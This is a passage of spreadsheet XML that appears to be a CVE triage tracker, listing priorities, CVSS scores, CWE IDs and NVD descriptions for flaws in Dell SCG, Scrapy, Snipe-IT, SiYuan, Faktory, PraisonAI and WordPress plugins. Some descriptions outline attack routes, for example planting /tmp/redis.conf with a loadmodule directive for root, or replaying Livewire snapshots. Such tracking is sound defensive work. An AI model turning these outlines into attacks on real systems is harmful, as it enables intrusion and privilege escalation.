          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Download of Code Without Integrity Check vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to command execution.</t>
        </is>
      </c>
      <c r="S551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79963</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84366</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr"/>
      <c r="Q552" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>Scrapy is a high-level web crawling and scraping framework for Python. Prior to 2.17.0, in scrapy/core/downloader/handlers/s3.py, Scrapy's S3DownloadHandler converts an S3-scheme bucket and key request into a plaintext HTTP request to the corresponding S3 endpoint unless request.meta["is_secure"] is explicitly enabled, then signs and sends the plaintext request with configured AWS credentials. A network attacker who can observe traffic between Scrapy and S3 can read the bucket and key path, AWS Authorization header, X-Amz-Security-Token when temporary credentials are used, S3 object contents, and S3 response headers. An active man-in-the-middle attacker can also modify the plaintext S3 response body, status code, and headers before Scrapy processes them, causing scraped-data poisoning, poisoned exports, HTTP cache poisoning when caching is enabled, or influence over later crawl targets through forged redirects or attacker-controlled links. Users making S3-scheme requests with AWS credentials are affected. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="S552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84366</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86746</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr"/>
      <c r="Q553" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 contains an authorization bypass vulnerability in Livewire components that enforce authorization only at the route level, not within component lifecycle methods. Attackers with a valid authenticated session can replay signed component snapshots via POST /livewire/update to invoke protected methods and escalate privileges, including creating OAuth clients, minting personal access tokens, and accessing sensitive admin data.</t>
        </is>
      </c>
      <c r="S553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86746</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87812</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr"/>
      <c r="Q554" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in Bazaar package cards where the iconURL metadata is inserted directly into HTML img src attributes without escaping. Attackers can inject malicious URLs with event handlers that execute JavaScript in the authenticated SiYuan origin when users view Bazaar listings, enabling API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="S554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87812</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30819</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr"/>
      <c r="Q555" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, iTop has a reflected Cross-Site Scripting (XSS) vulnerability in its dashboard revert functionality with the parameter dashboard_id in /pages/ajax.render.php. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30819</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49314</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr"/>
      <c r="Q556" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>OOB write vulnerability in the rendering and composition module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="S556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49314</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55538</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr"/>
      <c r="Q557" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, praisonai serve agents parses config["api_key"] but _create_agents_app() does not authenticate POST /agents or POST /agents/{agent_name}. Missing or incorrect bearer and X-API-Key values still reach agent execution. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55538</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63404</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr"/>
      <c r="Q558" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the embedded Redis bootstrapper is vulnerable to an insecure temporary file flaw that lets a local unprivileged user hijack the Redis configuration and escalate to root. It writes its startup configuration to a fixed, predictable, world-writable path, /tmp/redis.conf, only creating the file if it does not already exist and never validating it on later boots. Because /tmp is world-writable, a local unprivileged user can pre-create /tmp/redis.conf with attacker-chosen Redis directives before Faktory starts, and Faktory will use the planted file verbatim. Faktory only overrides the unixsocket, dir, and logfile options, leaving directives such as bind, protected-mode, requirepass, and loadmodule attacker-controlled. This lets an attacker silently expose the entire job queue over an unauthenticated network port with no visible error to the administrator. Because the official systemd unit runs Faktory, and the redis-server child it spawns, as root, an attacker can also supply a loadmodule directive to execute arbitrary native code in the root-owned Redis process, escalating from a local unprivileged user to root. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="S558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63404</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78485</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr"/>
      <c r="Q559" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R559"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Unauthorized access</t>
        </is>
      </c>
      <c r="S559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78485</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79635</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr"/>
      <c r="Q560" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R560"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unauthorized access.</t>
        </is>
      </c>
      <c r="S560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79635</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79692</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr"/>
      <c r="Q561" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an External Control of File Name or Path vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to filesystem access for attacker.</t>
        </is>
      </c>
      <c r="S561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79692</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79695</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr"/>
      <c r="Q562" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Handling of Highly Compressed Data (Data Amplification) vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="S562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79695</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80122</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr"/>
      <c r="Q563" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R56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563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80122</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86754</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr"/>
      <c r="Q564" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate Laravel Passport's OAuth client management routes, allowing any authenticated user to register OAuth clients with attacker-controlled redirect URIs. Attackers can trick administrators into approving consent screens, then exchange authorization codes for bearer tokens inheriting full admin API permissions lasting up to 40 years.</t>
        </is>
      </c>
      <c r="S564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86754</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87814</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr"/>
      <c r="Q565" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the search asset preview feature that fails to escape indexed asset content before inserting it into the DOM using innerHTML. Attackers who can place crafted text assets in a workspace can execute JavaScript in the SiYuan origin when victims preview the assets, enabling authenticated API requests and workspace manipulation.</t>
        </is>
      </c>
      <c r="S565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87814</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13359</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr"/>
      <c r="Q566" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>The Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via cntctfrm_contact_dropdown Parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload executes in the context of an administrator's browser session when they visit the plugin's message manager page at /wp-admin/admin.php?page=cntctfrmtdb_manager, making it possible to compromise administrator-level sessions via a simple unauthenticated contact form submission.</t>
        </is>
      </c>
      <c r="S566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13359</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14989</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr"/>
      <c r="Q567" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>The Cookie Banner for GDPR / CCPA – WPLP Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpl_user_preference' parameter in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The consent-logging AJAX endpoint is registered for unauthenticated users and its required nonce (wpl_consent_logging_nonce) is publicly emitted via wp_localize_script on the frontend, meaning any unauthenticated site visitor can plant a payload without any prior authentication or privileged access.</t>
        </is>
      </c>
      <c r="S567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14989</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17553</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>7.2</v>
      </c>
